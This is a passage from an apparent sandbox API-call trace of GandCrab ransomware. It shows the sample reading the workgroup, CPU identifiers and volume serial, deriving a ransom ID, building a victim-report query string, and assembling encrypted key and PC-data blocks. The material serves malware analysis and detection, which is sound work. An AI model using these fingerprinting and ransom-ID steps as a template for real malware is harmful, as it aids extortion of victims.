KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r\r\n", lpString2="---END PC DATA---" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r\r\n---END PC DATA---") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r\r\n---END PC DATA---" [0067.318] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.319] VirtualFree (lpAddress=0x1e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.319] lstrlenW (lpString="titwmvjl") returned 8 [0067.319] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1e50000 [0067.319] lstrcpyW (in: lpString1=0x1e50000, lpString2="titwmvjl" | out: lpString1="titwmvjl") returned="titwmvjl" [0067.319] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0067.319] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.319] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f4d8 | out: phkResult=0x19f4d8*=0x1e8) returned 0x0 [0067.320] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.320] RegQueryValueExW (in: hKey=0x1e8, lpValueName="Domain", lpReserved=0x0, lpType=0x0, lpData=0x1e70000, lpcbData=0x19f4c8*=0x80 | out: lpType=0x0, lpData=0x1e70000*=0x0, lpcbData=0x19f4c8*=0x2) returned 0x0 [0067.320] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.320] RegCloseKey (hKey=0x1e8) returned 0x0 [0067.320] wsprintfW (in: param_1=0x1e70000, param_2="WORKGROUP" | out: param_1="WORKGROUP") returned 9 [0067.320] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e90000 [0067.320] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x1ea0000 [0067.320] GetWindowsDirectoryW (in: lpBuffer=0x1ea0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.320] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ea0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x1ea0600, lpMaximumComponentLength=0x1ea0608, lpFileSystemFlags=0x1ea0604, lpFileSystemNameBuffer=0x1ea0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ea0600*=0xd2ca4def, lpMaximumComponentLength=0x1ea0608*=0xff, lpFileSystemFlags=0x1ea0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.321] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f4d8 | out: phkResult=0x19f4d8*=0x1e8) returned 0x0 [0067.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.321] RegQueryValueExW (in: hKey=0x1e8, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x1ea060c, lpcbData=0x19f4c8*=0x80 | out: lpType=0x0, lpData=0x1ea060c*=0x49, lpcbData=0x19f4c8*=0x52) returned 0x0 [0067.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.321] RegCloseKey (hKey=0x1e8) returned 0x0 [0067.321] lstrlenW (lpString="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 40 [0067.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.322] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f4d8 | out: phkResult=0x19f4d8*=0x1e8) returned 0x0 [0067.322] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.322] RegQueryValueExW (in: hKey=0x1e8, lpValueName="Identifier", lpReserved=0x0, lpType=0x0, lpData=0x1ea065c, lpcbData=0x19f4c8*=0x80 | out: lpType=0x0, lpData=0x1ea065c*=0x49, lpcbData=0x19f4c8*=0x4a) returned 0x0 [0067.322] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.322] RegCloseKey (hKey=0x1e8) returned 0x0 [0067.322] wsprintfW (in: param_1=0x1e90000, param_2="%d" | out: param_1="-758493713") returned 10 [0067.322] lstrcatW (in: lpString1="-758493713", lpString2="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHzIntel64 Family 6 Model 94 Stepping 3" | out: lpString1="-758493713Intel (R) Core(TM) i5-7500 CPU @ 3.40GHzIntel64 Family 6 Model 94 Stepping 3") returned="-758493713Intel (R) Core(TM) i5-7500 CPU @ 3.40GHzIntel64 Family 6 Model 94 Stepping 3" [0067.322] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x776b0000 [0067.322] GetProcAddress (hModule=0x776b0000, lpProcName="RtlComputeCrc32") returned 0x776d6b10 [0067.322] lstrlenW (lpString="-758493713Intel (R) Core(TM) i5-7500 CPU @ 3.40GHzIntel64 Family 6 Model 94 Stepping 3") returned 86 [0067.322] RtlComputeCrc32 (PartialCrc=0x29a, Buffer=0x1e90000, Length=0xac) returned 0x998a2f45 [0067.322] VirtualFree (lpAddress=0x1ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.323] lstrlenW (lpString="WORKGROUP") returned 9 [0067.323] lstrlenW (lpString="pc_group") returned 8 [0067.323] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x40) returned 0x1ea0000 [0067.323] lstrcatW (in: lpString1="", lpString2="pc_group" | out: lpString1="pc_group") returned="pc_group" [0067.323] lstrcatW (in: lpString1="pc_group", lpString2="=" | out: lpString1="pc_group=") returned="pc_group=" [0067.323] lstrcatW (in: lpString1="pc_group=", lpString2="WORKGROUP" | out: lpString1="pc_group=WORKGROUP") returned="pc_group=WORKGROUP" [0067.323] lstrcatW (in: lpString1="pc_group=WORKGROUP", lpString2="&" | out: lpString1="pc_group=WORKGROUP&") returned="pc_group=WORKGROUP&" [0067.323] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x40) returned 0x2300000 [0067.323] wsprintfW (in: param_1=0x2300000, param_2="%x%x" | out: param_1="998a2f45d2ca4def") returned 16 [0067.324] lstrcatW (in: lpString1="pc_group=WORKGROUP&", lpString2="ransom_id" | out: lpString1="pc_group=WORKGROUP&ransom_id") returned="pc_group=WORKGROUP&ransom_id" [0067.324] lstrcatW (in: lpString1="pc_group=WORKGROUP&ransom_id", lpString2="=" | out: lpString1="pc_group=WORKGROUP&ransom_id=") returned="pc_group=WORKGROUP&ransom_id=" [0067.324] lstrcatW (in: lpString1="pc_group=WORKGROUP&ransom_id=", lpString2="998a2f45d2ca4def" | out: lpString1="pc_group=WORKGROUP&ransom_id=998a2f45d2ca4def") returned="pc_group=WORKGROUP&ransom_id=998a2f45d2ca4def" [0067.324] lstrcatW (in: lpString1="pc_group=WORKGROUP&ransom_id=998a2f45d2ca4def", lpString2="&" | out: lpString1="pc_group=WORKGROUP&ransom_id=998a2f45d2ca4def&") returned="pc_group=WORKGROUP&ransom_id=998a2f45d2ca4def&" [0067.324] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.324] lstrlenW (lpString="pc_group=WORKGROUP&ransom_id=998a2f45d2ca4def&") returned 46 [0067.324] lstrlenW (lpString="ransom_id=") returned 10 [0067.324] lstrlenW (lpString="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 